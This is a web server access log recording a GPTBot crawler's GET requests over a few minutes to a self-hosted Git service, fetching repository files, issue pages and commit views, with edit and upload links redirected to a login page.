"/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13226] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" +[17/Feb/2026:17:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13226] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" +[17/Feb/2026:17:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11142] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py?display=source" [Client 74.7.227.38] [Length 13192] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 11758] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 10313] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19506] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19504] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19506] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15629] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:33:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:33:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:33:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" +[17/Feb/2026:17:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/main.py" +[17/Feb/2026:17:33:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" +[17/Feb/2026:17:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/.vscode" +[17/Feb/2026:17:33:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" +[17/Feb/2026:17:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/.vscode" +[17/Feb/2026:17:33:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" +[17/Feb/2026:17:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/main.py" +[17/Feb/2026:17:33:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" +[17/Feb/2026:17:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/.vscode" +[17/Feb/2026:17:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 11303] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" +[17/Feb/2026:17:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 9772] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" +[17/Feb/2026:17:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 9770] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" +[17/Feb/2026:17:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" +[17/Feb/2026:17:33:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:33:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:33:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:33:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" +[17/Feb/2026:17:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/.vscode" +[17/Feb/2026:17:33:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:33:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:17:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 52] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 10353] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 9783] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20391] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20389] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11844] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" +[17/Feb/2026:17:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 10122] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:17:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr 